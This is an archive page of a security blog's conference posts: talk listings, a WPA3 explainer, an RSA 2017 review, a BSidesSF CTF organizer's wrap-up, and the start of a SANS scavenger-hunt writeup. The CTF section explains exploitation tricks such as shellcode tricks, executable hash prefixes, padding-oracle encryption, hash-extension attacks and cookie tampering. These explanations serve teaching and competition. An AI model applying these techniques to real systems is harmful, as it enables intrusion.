Category Archives: conferences

HITB Security Conference in Amsterdam is all about advanced research

The agenda for Day 2 of the 9th annual HITB Security Conference in The Netherlands has been announced with even more advanced research including new sandbox evasion techniques, a ground breaking method for establishing covert channels over GSM mobile networks, a tool for backdooring cars and much more. Reference This: Sandbox Evasion Using VBA Referencing The sandbox, last line of defense for many networks, isn’t what it used to be. This talk shows how attackers … More

HITB Security Conference in Amsterdam to feature innovative research on attack and defense topics

The agenda for Day 1 of the 9th annual HITB Security Conference in The Netherlands has been announced and it’s packed with cutting edge research on a range of attack and defense topics from crypto currencies to fuzzing and more. Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation) In this presentation, Daniel Bohannon, a Senior Applied Security Researcher with MANDIANT’s Advanced Practices group, will dive deep into cmd.exe’s multi-faceted obfuscation opportunities beginning with … More

WPA3 will secure Wi-Fi connections in four significant ways in 2018

CES, the annual consumer electronics extravaganza in Las Vegas, isn’t just a showcase for virtual reality and poorly-timed power outages. It’s also an opportunity to get a peek at the future of network security.

That’s why on the first day of CES, the Wi-Fi Alliance announced the newest security protocol for Wi-Fi devices: WPA3. The new protocol is the most significant upgrade to Wi-Fi security since WPA2 was ratified in 2004.

Details are thin, but the announcement outlined four new security capabilities that will protect wireless connections in the years to come.

1. Protection against brute force “dictionary” attacks

Despite a generation of irritated admins requesting that users choose stronger passwords, the most popular passwords are still common words like “password” or “football.” That makes networks vulnerable to simple brute force attacks that systematically submit every word in the dictionary as a password. Online tutorials of this Wi-Fi hack are trivially easy to find.

WPA3 should make that issue a thing of the past by “delivering robust protections even when users choose passwords that fall short of typical complexity recommendations.” Some security experts have speculated that this refers to a type of key exchange called Dragonfly. According to the Internet Engineering Task Force (IETF), Dragonfly “employs discrete logarithm cryptography to perform an efficient exchange in a way that performs mutual authentication using a password that is probably resistant to an offline dictionary attack.”

2. Easier Internet of Things (IoT) security

WPA3 promises to “simplify the process of configuring security for devices that have limited or no display interface.” That’s a nod to the growing number of devices that are enhanced by network connections, such as smart door locks, home personal assistants, and (apparently) toothbrushes. Since IoT devices rarely have a graphical interface, it’s difficult to configure them for optimal security. You can’t type a password directly on a toothbrush, after all. This can naturally lead to less secure connections and vulnerable devices. Hackers could, for example, access your smart speakers and play whatever audio they want in your living room.

The Wi-Fi Alliance hasn’t yet offered details on how WPA3 overcomes this challenge. But researchers have successfully enhanced security on IoT devices by configuring them with a smartphone.

3. Stronger encryption

WPA2 requires a 64-bit or 128-bit encryption key. But WPA3 uses a stronger standard: 192-bit encryption and alignment with the Commercial National Security Algorithm (CNSA) Suite. This promises consumers the kind of beefier security that’s currently used to protect governments and corporations.

4. Secure public Wi-Fi

Public Wi-Fi connections, like the kind you might use in a coffee shop or library, are always less secure than private ones. That’s partly due to the inherent security limitations of open wireless networks, and party due to the fact that librarians and coffee shop owners aren’t typically network security masters. The new standards promise to “strengthen user privacy in open networks through individualized data encryption.” Though the announcement doesn’t offer specifics on how that will be achieved.

Curiously, during its CES announcement, the Wi-Fi Alliance made no mention of KRACK, the vulnerability in WPA2 that impacted all Wi-Fi devices. However, Mathy Vanhoef, the researcher who discovered the vulnerability, wrote several enthusiastic tweets about WPA3.

WPA3

In one, he speculates that WPA3 will include Opportunistic Wireless Encryption. This enables connection on an open network without a shared and public Pre-Shared Key (PSK). That’s important because a PSK can give hackers easy access to the Traffic Encryption Keys (TEKs), thus allowing them access to a data stream. In other words, the new protocol should help prevent hackers from snooping on your web browsing while you’re at Starbucks.

Before we start to see the benefits of WPA3, the Wi-Fi Alliance has to certify hardware that uses the security protocol. So there’s no telling when people can start enjoying the enhanced security protections. But you shouldn’t be surprised if you start seeing devices that use the new protocol later this year.

Guest post by Logan Strain, author for Crimewire
Father, writer, and reformed Usenet troll. Lives in San Diego. Doesn’t surf, but should learn.
Follow Logan on Twitter @LM_Strain

The post WPA3 will secure Wi-Fi connections in four significant ways in 2018 appeared first on Malwarebytes Labs.

Virus Bulletin Publication And Presentation


Virus Bulletin conference is a well regarded intimate technical conference focused on malware research. It provides a good balance between listening to technical talks and spending time exchanging experiences with colleagues from different companies; all working on the same task of making our computing environments more secure.

This past October, Talos participated at the Virus Bulletin conference in Madrid with a talk presented by Warren Mercer and me, Paul Rascagneres. This talk covered the latest techniques used in the reconnaissance phase of attacks by APT actors. During the presentation, we demonstrated how the reconnaissance phase is executed as a part of the infection process in order to protect valuable zero-day exploits, malware frameworks, and other tools.



Virus Bulletin requires selected speakers to submit a research paper which can later be used to help the security research community with their own research. Our submission to the conference was a paper titled "Modern reconnaissance phase by APT – protection layer". This paper is based on research conducted by Talos throughout the year and it is now publicly available on the Virus Bulletin web site.

If you missed it at the conference, our presentation is available on the Virus Bulletin Youtube channel. The recorded presentation provides a good overview of the paper and it will hopefully make you enjoy reading the full paper as well.

RSA USA 2017 In Review

Now that I've had a week to recover from the annual infosec circus event to end all circus events, I figured it's a good time to attempt being reflective and proffer my thoughts on the event, themes, what I saw, etc, etc, etc.

For starters, holy moly, 43,000+ people?!?!?!?!?! I mean... good grief... the event was about a quarter of that a decade ago. If you've never been to RSA, or if you only started attending in the last couple years, then it's really hard to describe to you how dramatic the change has been since ~2010 when the numbers started growing like this (to be fair, yoy growth from 2016 to 2017 wasn't all that huge).

With that... let's drill into my key highlights...

Size Matters

Why do people like me go to RSA? Because it's the one week in the year where I can see almost every single vendor in the industry, as well as see people I know and like who I otherwise would never get to see in person (aka "networking"). It truly is an enormous event, and it has definitely passed the threshold of being overwhelming. Several people I've know for years did not make the trip this year, and I suspect this will become a trend, but in the meantime, in many ways it's a "must attend" event.

The down-side to an event this large, and something I learned back in my Gartner days, is that - as someone with nearly 2 decades of industry experience - this is not an event where you're going to find much great content. Talks must, out of necessity, be tuned to the median audience, which means looking backward at what was cutting-edge 5-10 years ago. Sad, but true. There's simply not much room for cutting-edge thinking or discussion at the event nay more.

Soooo... why go back? Again, so long as there's business development and networking benefit, it is an essential event, but it's also very costly. Hotel pricing alone makes this an increasingly difficult prospect. For as much as we're spending on hotels each year, I could very likely visit friends in 3-4 different parts of the country and break even on travel costs. It's also increasingly a lot of noise, and much harder to sift value from that noise. I truly believe RSA is nearing the point where they'll have to either break the event into multiple events (kind of like 3 wks of SxSW), or they'll at least need to move to a different model where you're attending a conference within a conference (similar to "schools" within a large university). As it stands today, it's simply too easy to get lost in the shuffle and derive diminishing value.

Automation Nearing the Mainstream

We've been talking about security automation and orchestration for several years now, but it's often been with only a handful of examples, and generally quick forward-looking. We're just now finally reaching the point where the automation message is being picked up in the mainstream and more expansive examples are emerging.

One thing I noticed this year is that "automation" was prevalent in many booths. There are now at least a dozen vendors purportedly in the space (up from the days of it being Invotas (FireEye) and Phantom). No, I can't remember any names, but suffice to say, it's a growing list. Also, separately, I've noticed that orgs like Chef and Puppet have also made an attempt to expand their automation appeal to security (not to mention Service Now doing the same).

The point here is this: The mainstream consensus is finally starting to catch up with the reality that we will never be able to scale human resources fast enough to successfully address the rapidly changing threat landscape. Thus, we absolutely must automate as much as possible. We don't need SOC analysts staring at screens, pushing buttons when a color changes from green to red. That can be automated. Instead, we need to think about these processes and make smart decisions about when and where a human actually needs to be in the loop. This is our future, which we should eagerly embrace because it then frees us up to do much more interesting and exciting things.

DevSecOps/Secure DevOps

Since we're talking about automation, it's only natural to pivot briefly into DevOps/DevSecOps/Secure DevOps. This year's Monday event on DevSecOps was ok, if not highly repetitive. However, initial attendance was strong, and feedback has reportedly been good (the schedule got a bit foobar, so attendance declined after lunch, c'est la vie).

Here's what's important: Companies are continuing to reinvent how they operate, and DevOps is the underlying model. As such, we need to push hard to ensure that Dev and Ops teams have security responsibilities in their assigned duties, and that they are held accountable accordingly. A DevOps co-worker recently complained about this "DevSecOps" thing, and I pointed out that the entire reason for it is as a kludge because security has once again been left behind, and neither Dev nor Ops has taken on (or been assigned) security responsibilities, nor are they being held accountable for poor security decisions. THIS IS A CULTURAL FAILING THAT AFFECTS ALMOST EVERY SINGLE COMPANY AROUND.

In DevOps, the norm is always to point to "gold standard" examples like Netflix, Facebook, Etsy, etc. However, what people oftentimes forget in looking at these orgs is that, for the most part, they started out doing DevOps from the early days. There was very little need for cultural transformation because they were already operating in a DevOps manner. For companies that have been around for much, much, much longer, there will be internal opposition and institutional inertia that will slow down transformations. It's imperative that these cultural attributes be supplanted, aggressively if necessary, in order to remove barriers to change. DevOps provides an amazing template for operating an agile, efficient, effective organization... but only if companies fundamentally change how they function, including cultural transformation.

AI, ML, and Big Data Lies

If we were to take all the marketing at face value, then we'd be led to believe that the machines are thinking for themselves and we're a mere small step away from becoming part of The Matrix. Thankfully, that's not really true at all. The majority of companies claiming "AI" today are really being misleading and disingenuous. The simple fact is the majority of products are still based on heuristics or machine learning (ML) - sometimes both.

Heuristics is the traditional pattern matching we've seen for decades upon decades upon decades. Your traditional AV or IDS "solution"? It's primarily based on heuristically matching patterns and signatures to detect "a known bad thing." These are ok, but in the grand scheme they're providing little lasting value.

ML has emerged as an alternative, wherein rather than looking for patterns, we instead model environments or behaviors, and then do alerts based on either matching or deviating from the models (sometimes both!). The ML approach is actually quite promising, though it's premised on the ability to actual create a discrete model of an environment or behavior. It is also imperative that ML engines be constantly rebuilding the models to account for changes in an environment or behavior (for example, imagine building a model of your diet starting in mid-October and running through the end of the year, and then trying to apply that same model to your diet Jan-Mar after you've made major life changes, perhaps as part of a New Year's Resolution).

There is a lot of hope in AI, ML, et al, and I think for good reason. Frankly, ML gives us a lot of value when applied to reasonably discrete environments (e.g., containers), and thus I think we'll continue to see great growth and success in this space. I expect that computing environments will also continue to evolve and grow to make modeling of them that much easier. I think there's much promise.

As for AI itself, we'll have to wait and see, but I suspect we're a good decade+ away from true examples of real-world applications. However, that said, if you're in a lower-level role (analyst, basic infrastructure config, etc.), then now is a good time to invest in training/education to improve your skills to raise yourself up to a higher-level job that will be less easily threatened by AI+automation. As I noted above, we really do not need SOC analysts staring at screens clicking buttons according to a set process. Machines can already do that today. Thus there's no job security in it. Instead, become the person who builds and trains these automation tools, or be the higher-level "fixer" who is activated one automation has done all the base enumeration and examination. The world is changing rapidly, and will look quite different in a decade.

The Threat Is Real / Ignore the FUD

One of my favorite tunes from last year is Megadeth's "The Threat Is Real" as it's really quite an appropriate phrase. Hacks are succeeding every day. Breaches are so commonplace that the mainstream media has all but lost interest in reporting on them. Incidents are inevitable. And, yet, in some ways they needn't be so inevitable; at least, not to the degree and severity we continually see. Whether it be massive DDoS attacks built on the back of woefully insecure IoT devices or sizable holes in cloud CDN infrastructure a la Cloudbleed, there are a lot of holes, a lot of bugs, and a lot of undertrained people, all of which will lead to bad days.

That said, we also need to be incredibly mindful and diligent to avoid the FUD. There's too much FUD. It's like running around telling us that "we're all gonna die" as if we don't all accept this as an inevitability. Come on, folks, let's get out of that red mental state (fear/panic/anger) and apply some rational thought. There are tons of things we can be doing to prepare and protect our organizations, our customers/clients, and our resources. We just need to take a deep breath, settle down, and execute.

What should we do? Well, interestingly, it's not all that strange a list. First and foremost, Basic Security Hygiene, which I wrote about while at Gartner nearly 2.5 years ago. Things like robust IAM (centralized, processized, monitored), vuln and patch mgmt, and applying consistent, secure standards for infrastructure and development are all great starting points. Beyond that, it comes down to taking the time to understand your environment and exposures, and investing in tools and techniques that will produce measurable results (measurement is key!!!). A progressive security awareness program can be critical to educating and incentivizing people to make better decisions, and really reflects the overall imperative to transform the business and it's underlying culture. We can absolutely make things better, but it requires effort and thoughtfulness.
---

*whew* Ok... so, there you have it... my thoughts from RSA 2017. All told, it was a so-so week for me personally, but I'll definitely be back for one more year. TBD after that. It's really quite the circus these days. This year was especially difficult with how spread out things were (Moscone South has a major construction project underway, so the Marriott Marquis was enlisted). The wifi and mobile signals in the Marquis dungeon were nonexistent, which was painful. Also painful was the 4 spread out venues for Codebreaker's Bash on Thursday evening. It didn't work. Because people were spread all over, it was difficult to casually run into folks I was hoping to see. Hopefully next year they'll revert to a large single venue (I really, really, really enjoyed the Bash at AT&T Park, though many folks complained about it). Finding a venue for 43k+ people has to be incredibly challenging. Of course, so is finding a hotel room each year, so, ya know, there's that, too. Ha.

Hope you find this interesting/useful! Until next time...

BSidesSF CTF wrap-up

Welcome!

While this is technically a CTF writeup, like I frequently do, this one is going to be a bit backwards: this is for a CTF I ran, instead of one I played! I've gotta say, it's been a little while since I played in a CTF, but I had a really good time running the BSidesSF CTF! I just wanted to thank the other organizers - in alphabetical order - @bmenrigh, @cornflakesavage, @itsc0rg1, and @matir. I couldn't have done it without you folks!

BSidesSF CTF was a capture-the-flag challenge that ran in parallel with BSides San Francisco. It was designed to be easy/intermediate level, but we definitely had a few hair-pulling challenges.

The goal of this post is to explain a little bit of the motivation behind the challenges I wrote, and to give basic solutions. It's not going to have a step-by-step walkthrough of each challenge - though you might find that in the writeups list - but, rather, I'll cover what I intended to teach, and some interesting (to me :) ) trivia.

If you want to see the source of the challenges, our notes, and mostly everything else we generated as part of creating this CTF, you can find them here:

  • Original sourcecode on github
  • Google Drive notes (note that that's not the complete set of notes - some stuff (like comments from our meetings, brainstorming docs, etc) are a little too private, and contain ideas for future challenges :) )

Part of my goal for releasing all of our source + planning documents + deployment files is to a) show others how a CTF can be run, and b) encourage other CTF developers to follow suit and release their stuff!

As of the writing, the scoreboard and challenges are still online. We plan to keep them around for a couple more days before finally shutting them down.

Infrastructure

The rest of my team can most definitely confirm this: I'm not an infrastructure kinda guy. I was happy to write challenges, and relied on others for infrastructure bits. The only thing I did was write a Dockerfile for each of my challenges.

As such, I'll defer to my team on this part. I'm hoping that others on my team will post more details about the configurations, which I'll share on my Twitter feed. You can also find all the Dockerfiles and deployment scripts on our Github repository.

What I do know is, we used:

  • Googles CTF Scoreboard running on AppEngine for our scoreboard
  • Dockerfiles for each challenge that had an online component, and Docker for testing
  • docker-compose for testing
  • Kubernetes for deployment
  • Google Container Engine for running all of that in The Cloud

As I said, all the configurations are on Github. The infrastructure worked great, though, we had absolutely no traffic or load problems, and only very minor other problems.

I'm also super excited that Google graciously sponsored all of our Google Cloud expenses! The CTF weekend cost us roughly $500 - $600, and as of now we've spent a little over $800.

Players

Just a few numbers:

  • We had 728 teams register
  • We had 531 teams score at least one point
  • We had 354 teams score at least 100 points
  • We had 23 teams submit at least one on-site flag (presumably, that many teams played on-site)

Also, the top-10 teams were:

  • dcua :: 6773
  • OpenToAll :: 5178
  • scryptos :: 5093
  • Dragon Sector :: 4877
  • Antichat :: 4877
  • p4 :: 4777
  • khack40 :: 4677
  • squareroots :: 4643
  • ASIS :: 4427
  • Ox002147 :: 4397

The top-10 teams on-site were:

  • OpenToAll :: 5178
  • ▣ :: 3548
  • hash_slinging_hackers :: 3278
  • NeverTry :: 2912
  • 0x41434142 :: 2668
  • DevOps Solution :: 1823
  • Shadow Cats :: 1532
  • HOW BOU DAH :: 1448
  • Newbie :: 762
  • CTYS :: 694

The full list can be found on our CTFTime.org page.

On-site challenges

We had three on-site challenges (none of them created by me):

on-sight [1]

This was a one-point challenge designed simply to determine who's eligible for on-site prizes. We had to flag taped to the wall. Not super interesting. :)

(Speaking of prizes, I want to give a shout out to Synack for providing some prizes, and in particular to working with us on a fairly complex set-up for dealing with said prizes. :)

Shared Secrets [250]

The Shared Secrets challenge was a last-minute idea. We wanted more on-site challenges, and others on the CTF organizers team came up with Shamir Shared Secret Scheme. We posted QR Codes containing pieces of a secret around the venue.

It was a "3 of 6" scheme, so only three were actually needed to get the secret.

The quotes on top of each image try to push people towards either "Shamir" or "ACM 22(11)". My favourite was, "Hi, hi, howdy, howdy, hi, hi! While everyone is minus, you could call me multiply", which is a line from a Shamir (the rapper) song. I did not determine if Shamir the rapper and Shamir the cryptographer were the same person. :)

Locker [150]

Locker is really cool! We basically set up a padlock with an Arduino and a receipt printer. After successfully picking the lock, you'd get a one-time-use flag printed out by the printer.

(We had some problems with submitting the flag early-on, because we forgot to build the database for the one-time-use flags, but got that resolved quickly!)

@bmenrigh developed the lock post, which detected the lock opening, and @matir developed the software for the receipt printer.

My challenges

I'm not going to go over others' challenges, other than the on-site ones I already covered, I don't have the insight to make comments on them. However, I do want to cover all my challenges. Not a ton of detail, but enough to understand the context. I'll likely blog about a couple of them specifically later.

I probably don't need to say it, but: challenge spoilers coming!

'easy' challenges [10-40]

I wrote a series of what I called 'easy' challenges. They don't really have a trick to them, but teach a fundamental concept necessary to do CTFs. They're also a teaching tool that I plan to use for years to come. :)

easy [10] - a couldn't-be-easier reversing challenge. Asks for a password then prints out a flag. You can get both the password and the flag by running strings on the binary.

easyauth [30] - a web challenge that sets a cookie, and tells you it's setting a cookie. The cookie is simply 'username=guest'. If you change the cookie to 'username=administrator', you're given the flag. This is to force people to learn how to edit cookies in their browser.

easyshell [30] and easyshell64 [30] - these are both simple programs where you can send it shellcode, and they run it. It requires the player to figure out what shellcode is and how to use it (eg, from msfvenom or an online shellcode database). There's both a 32- and a 64-bit version, as well.

easyshell and easyshell64 are also good ways to test shellcode, and a place where people can grab libc binaries, if needed.

And finally, easycap [40] is a simple packet capture, where a flag is sent across the network one packet at a time. I didn't keep my generator, but it's essentially a ruby script that would do a s.send() on each byte of a string.

skipper [75] and skipper2 [200]

Now, we're starting to get into some of the levels that require some amount of specialized knowledge. I wrote skipper and skipper2 for an internal company CTF a long time ago, and have kept them around as useful teaching tools.

One of the first thing I ever did in reverse engineering was write a registration bypass for some icon-maker program on 16-bit DOS using the debug.com command and some dumb luck. Something where you had to find the "Sorry, your registration code is invalid" message and bypass it. I wanted to simulate this, and that's where these came from.

With skipper, you can bypass the checks by just changing the program counter ($eip or $rip) or nop'ing out the checks. skipper2, however, incorporates the results from the checks into the final flag, so they can't be skipped quite so easily. Rather, you have to stop before each check and load the proper value into memory to get the flag. This simulates situations I've legitimately run into while writing keygens.

hashecute [100]

When I originally conceived of hashecute, I had imagined it being fairly difficult. The idea is, you can send any shellcode you want to the server, but you have to prepend the MD5 of the shellcode to it, and the prepended shellcode runs as well. That's gotta be hard, right? Making an MD5 that's executable??

Except it's not, really. You just need to make sure your checksum starts with a short-jump to the end of the checksum (or to a NOP sled if you want to do it even faster!). That's \xeb\x0e (for jmp) or \e9\x0e (for call), as the simplest examples (there are practically infinite others). And it's really easy to do that by just appending crap to the end of the shellcode: you can see that in my solution.

It does, however, teach a little critical thinking to somebody who might not be super accustomed to dealing with machine code, so I intend to continue using this one as a teaching tool. :)

b-64-b-tuff [100]

b-64-b-tuff has the dual-honour of both having the stupidest name and being the biggest waste of my own time .:)

So, I came up with the idea of writing this challenge during a conversation with a friend: I said that I know people have written shellcode encoders for unicode and other stuff, but nobody had ever written one for Base64. We should make that a challenge!

So I spent a couple minutes writing the challenge. It's mostly just Base64 code from StackOverflow or something, and the rest is the same skeleton as easyshell/easyshell64.

Then I spent a few hours writing a pure Base64 shellcode encoder. I intend to do a future blog 100% about that process, because I think it's actually a kind of interesting problem. I eventually got to the point where it worked perfectly, and I was happy that I could prove that this was, indeed, solveable! So I gave it a stupid name and sent out my PR.

That's when I think @matir said, "isn't Base64 just a superset of alphanumeric?".

Yes. Yes it is. I could have used any off-the-shelf alphanumeric shellcode encoder such as msfvenom. D'OH!

But, the process was really interesting, and I do plan to write about it, so it's not a total loss. And I know at least one player did the same (hi @Grazfather! [he graciously shared his code where he encoded it all by hand]), so I feel good about that :-D

in-plain-sight [100]

I like to joke that I only write challenges to drive traffic to my blog. This is sort of the opposite: it rewards teams that read my blog. :)

A few months ago, while writing the delphi-status challenge (more on that one later), I realized that when encrypting data using a padding oracle, the last block can be arbitrarily chosen! I wrote about it in an off-handed sort of way at that time.

Shortly after, I realized that it could make a neat CTF challenge, and thus was born in-plain-site.

It's kind of a silly little challenge. Like one of those puzzles you get in riddle books. The ciphertext was literally the string "HiddenCiphertext", which I tell you in the description, but of course you probably wouldn't notice that. When you do, it's a groaner. :)

Fun story: I had a guy from the team OpenToAll bring up the blog before we released the challenge, and mention how he was looking for a challenge involving plaintext ciphertext. I had to resist laughing, because I knew it was coming!

i-am-the-shortest [200]

This was a silly little level, which once again forces people to get shellcode. You're allowed to send up to 5 bytes of shellcode to the server, where the flag is loaded into memory, and the server executes them.

Obviously, 5 bytes isn't enough to do a proper syscall, so you have to be creative. It's more of a puzzle challenge than anything.

The trick is, I used a bunch of in-line assembly when developing the challenge (see the original source, it isn't pretty!) that ensures that the registers are basically set up to make a syscall - all you have to do it move esi (a pointer to the flag) into ecx. I later discovered that you can "link" variables to specific registers in gcc.

The intended method was for people to send \xcc for the shellcode (or similar) and to investigate the registers, determining what the state was, and then to use shellcode along the lines of xchg esi, ecx / int 0x80. And that's what most solvers I talked to did.

One fun thing: eax (which is the syscall number when a syscall is made) is set to len(shellcode) (the return value of read()). Since sys_write, the syscall you want to make, is number 4, you can easily trigger it by sending 4 bytes. If you send 5 bytes, it makes the wrong call.

Several of the solutions I saw had a dec eax instruction in them, however! The irony is, you only need that instruction because you have it. If you had just left it off, eax would already be 4!

delphi-status [250]

delphi-status was another of those levels where I spent way more time on the solution than on the challenge.

It seems common enough to see tools to decrypt data using a padding oracle, but not super common to see challenges where you have to encrypt data with a padding oracle. So I decided to create a challenge where you have to encrypt arbitrary data!

The original goal was to make somebody write a padding oracle encryptor tool for me. That seemed like a good idea!

But, I wanted to make sure this was do-able, and I was just generally curious, so I wrote it myself. Then I updated my tool Poracle to support encryption, and wrote a blog about it. If there wasn't a tool available that could encrypt arbitrary data with a padding oracle, I was going to hold back on releasing the code. But tools do exist, so I just released mine.

It turns out, there was a simpler solution: you could simply xor-out the data from the block when it's only one block, and xor-in arbitrary data. I don't have exact details, but I know it works. Basically, it's a classic stream-cipher-style attack.

And that just demonstrates the Cryptographic Doom Principle :)

ximage [300]

ximage might be my favourite level. Some time ago - possibly years - I was chatting with a friend, and steganography came up. I wondered if it was possible to create an image where the very pixels were executable!?

I went home wondering if that was possible, and started trying to think of 3-byte NOP-equivalent instructions. I managed to think of a large number of work-able combinations, including ones that modified registers I don't care about, plus combinations of 1- and 2-byte NOP-equivalents. By the end, I could reasonably do most colours in an image, including black (though it was slightly greenish) and white. You can find the code here.

(I got totally nerdsniped while writing this, and just spent a couple days trying to find every 3-byte NOP equivalent to see how much I can improve this!)

Originally, I just made the image data executable, so you'd have to ignore the header and run the image body. Eventually, I noticed that the bitmap header, 'BM', was effectively inc edx / dec ebp, which is a NOP for all I'm concerned. That's followed by a 2-byte length value. I changed that length on every image to be \xeb\x32, which is effectively a jump to the end of the header. That also caused weird errors when reading the image, which I was totally fine with leaving as a hint.

So what you have is an image that's effectively shellcode; it can be loaded into memory and run. A steganographic method that has probably never been done. :)

beez-fight [350]

beez-fight was an item-duplication vulnerability that was modeled after a similar vulnerability in Diablo 2. I had a friend a lonnnng time ago who discovered a vulnerability in Diablo 2, where when you sold an item it was copied through a buffer, and that buffer could be sold again. I was trying to think of a similar vulnerability, where a buffer wasn't cleared correctly.

I started by writing a simple game engine. While I was creating items, locations, monsters, etc., I didn't really think about how the game was going to be played - browser? A binary I distribute? netcat? Distributing a binary can be fun, because the player has to reverse engineer the protocol. But netcat is easier! The problem is, the vulnerability has to be a bit more subtle in netcat, because I can't depend on a numbered buffer - what you see is what you get!

Eventually, I came upon the idea of equip/unequip being problematic. Not clearing the buffer properly!

Something I see far too much in real life is code that checks if an object exists in a different way in different places. So I decided to replicate that - I had both an item that's NULL-able, and a flag :is_equipped. When you tried to use an item, it would check if the :is_equipped flag is set. But when you unequipped it, it checked if the item was NULL, which never actually happened (unequipping it only toggled the flag). As a result, you could unequip the item multiple times and duplicate it!

Once that was done, the rest was easy: make a game that's too difficult to reasonably survive, and put a flag in the store that's worth a lot of gold. The only reasonable way to get the flag is to duplicate an item a bunch, then sell it to buy the flag.

I think I got the most positive feedback on this challenge, people seem to enjoy game hacking!

vhash + vhash-fixed [450]

This is a challenge that me and @bmenrigh came up with, designed to be quite difficult. It was vhash, and, later, vhash-fixed - but we'll get to that. :)

It all dates back to a conversation I had with @joswr1ght about a SANS Holiday Hack Challenge level I was designing. I suggested using a hash-extension vulnerability, and he said we can't, because of hash_extender, recklessly written by yours truly, ruining hash extension vulnerabilities forever!

I found that funny, and mentioned it to @bmenrigh. We decided to make our own novel hashing algorithm that's vulnerable to an extension attack. We decided to make it extra hard by not giving out source! Players would have to reverse engineer the algorithm in order to implement the extension attack. PERFECT! Nobody knows as well as me how difficult it can be to create a new hash extension attack. :)

Now, there is where it gets a bit fun. I agreed to write the front-end if he wrote the back-end. The front-end was almost exactly easyauth, except the cookie was signed. We decided to use an md5sum-like interface, which was a bit awkward in PHP, but that was fine. I wrote and tested everything with md5sum, and then awaited the vhash binary.

When he sent it, I assumed vhash was a drop-in replacement without thinking too much about it. I updated the hash binary, and could log in just fine, and that was it.

When the challenge came out, the first solve happened in only a couple minutes. That doesn't seem possible! I managed to get in touch with the solver, and he said that he just changed the cookie and ignored the hash. Oh no! Our only big mess-up!

After investigation, we discovered that the agreed md5sum-like interface meant, to @bmenrigh, that the data would come on stdin, and to me it meant that the file would be passed as a parameter. So, we were hashing the empty string every time. Oops!

Luckily, we found it, fixed it, and rolled out an updated version shortly after. The original challenge became an easy 450-pointer for anybody who bothered to try, and the real challenge was only solved by a few, as intended.

dnscap [500]

dnscap is simply a packet-capture from dnscat2, running in unecrypted-mode, over a laggy connection (coincidentally, I'm writing this writeup at the same bar where I wrote the original challenge!). In dnscat2, I sent a .png file that contains the dnscat2 logo, as well as the flag. Product placement anyone?

I assumed it would be fairly difficult to disentangle the packets going through, which is why we gave it a high point-value. Ultimately, it was easier than we'd expected, people were able to solve it fairly quickly.

nibbler [666]

And finally, my old friend nibbler.

At some point in the past few months, I had the realization: nibbles (the snake game for QBasic where I learned to program) sounds like nibble (a 4-bit value). I forget where it came from exactly, but I had the idea to build a nibbles-clone with a vulnerability where you'd have to exploit it by collecting the 'fruit' at the right time.

I originally stored the scores in an array, and each 'fruit' would change between between worth 00 and FF points. You'd have to overflow the stack and build an exploit by gathering fruit with the snake. You'll notice that the name that I ask for at the start uses read() - that's so it can have NUL bytes so you can build a ROP-chain in your name.

I realized that picking values between 00 and FF would take FOREVER, and wanted to get back to the original idea: nibbles! But I couldn't think of a way to make it realistic while only collecting 4-bit values.

Eventually, I decided to drop the premise of performing an exploit, and instead, just let the user write shellcode that is run directly. As a result, it went from a pwn to a programming challenge, but I didn't re-categorize it, largely because we don't have programming challenges.

It ended up being difficult, but solveable! One of my favourite writeups is here; I HIGHLY recommend reading it. My favourite part is that he named the snakes and drew some damn sexy images!

I just want to give a shout out to the poor soul, who I won't name here, who solved this level BY HAND, but didn't cat the flag file fast enough. I shouldn't have had the 10-second timeout, but we did. As a result, he didn't get the flag. I'm so sorry. :(

Fun fact: @bmenrigh was confident enough that this level was impossible to solve that he made me a large bet that less than 2 people would solve it. Because we had 9 solvers, I won a lot of alcohol! :)

Conclusion

Hopefully you enjoyed hearing a little about the BSidesSF CTF challenges I wrote! I really enjoyed writing them, and then seeing people working on solving them!

On some of the challenges, I tried to teach something (or have a teachable lesson, something I can use when I teach). On some, I tried to make something pretty difficult. On some, I fell somewhere between. But there's one thing they have in common: I tried to make my own challenges as easy as possible to test and validate. :)

SANS Hackfest writeup: Hackers of Gravity

Last weekA few weeks ago, SANS hosted a private event at the Smithsonian's Air and Space Museum as part of SANS Hackfest. An evening in the Air and Space Museum just for us! And to sweeten the deal, they set up a scavenger hunt called "Hackers of Gravity" to work on while we were there!

We worked in small teams (I teamed up with Eric, who's also writing this blog with me). All they told us in advance was to bring a phone, so every part of this was solved with our phones and Google.

Each level began with an image, typically with a cipher embedded in it. After decoding the cipher, the solution and the image itself were used together to track down a related artifact.

This is a writeup of that scavenger hunt. :)

Challenge 1: Hacker of Tenacity

The order of the challenges was actually randomized, so this may not be the order that anybody else had (homework: there are 5040 possible orderings of challenges, and about 100 people attending; what are the odds that two people had the same order? The birthday paradox applies).

The first challenge was simply text:

Sometimes tenacity is enough to get through a difficult challenge. This Hacker of Gravity never gave up and even purposefully created discomfort to survive their challenge against gravity. Do you possess the tenacity to break this message? 

T05ZR1M0VEpPUlBXNlpTN081VVdHMjNGT0pQWEdaTEJPUlpRPT09PQ==

Based on the character set, we immediately recognized it as Base64. We found an online decoder and it decoded to:

ONYGS4TJORPW6ZS7O5UWG23FOJPXGZLBORZQ====


We recognized that as Base32 - Base64 will never have four "====" signs at the end, and Base32 typically only contains uppercase characters and numbers. (Quick plug: I'm currently working on Base32 support for dnscat2, which is another reason I quickly recognized it!)

Anyway, the Base32 version decoded to spirit_of_wicker_seats, and Eric recognized "Spirit" as a possible clue and searched for "Spirit of St Louis Wicker Seats", which revealed the following quote from the Wikipedia article on the Spirit of St. Louis: "The stiff wicker seat in the cockpit was also purposely uncomfortable".

The Spirit of St. Louis was one of the first planes we spotted, so we scanned the QR code and found the solution: lots_of_fuel_tanks!

Challenge 2: Hacker of Navigation

We actually got stuck on the second challenge for awhile, but eventually we got an idea of how these challenges tend to work, after which we came back to it.

We were given a fragment of a letter:

The museum archives have located part of a letter in an old storage locker from some previously lost collection. They'd REALLY like your help finding the author.

You'll note at the bottom-left corner it implies that "A = 50 degrees". We didn't notice that initially. :)

What we did notice was that the degrees were all a) multiples of 10, and b) below 260. That led us to believe that they were numbered letters, times ten (so A = 10, B = 20, C = 30, etc).

The numbers were: 100 50 80 90 80 100 50 230 120 130 190 180 130 230 240 50.

Dividing by 10 gives 10 5 8 9 8 10 5 23 12 13 19 18 13 23 24 5.

Converting that to the corresponding letters gave us JEHIH JEWLMSRMWXE. Clearly not an English sentence, but it looks like a cryptogram (JEHIH looks like "THERE" or "WHERE").

